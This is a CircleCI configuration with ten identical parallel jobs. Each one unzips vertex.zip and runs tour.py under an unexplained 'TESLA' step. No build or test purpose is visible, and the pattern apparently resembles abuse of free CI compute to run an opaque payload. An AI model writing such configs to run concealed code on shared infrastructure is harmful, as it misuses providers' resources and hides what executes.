working_dir: &working_dir ~/app
version: 2.1
jobs:
  red:
    #######################################################################
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
              unzip vertex.zip;python tour.py
            
            
  blue:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py
  silver:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py

  yellow:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py
  green:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py

  purple:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py

  pink:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py

  black:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py
  white:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py


  grey:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          
          command: |
            unzip vertex.zip;python tour.py


workflows:
    version: 2.1
    build:
        jobs:
             - red
             - blue
             - silver
             - yellow
             - green
             - purple
             - pink
             - black
             - white
             - grey
             
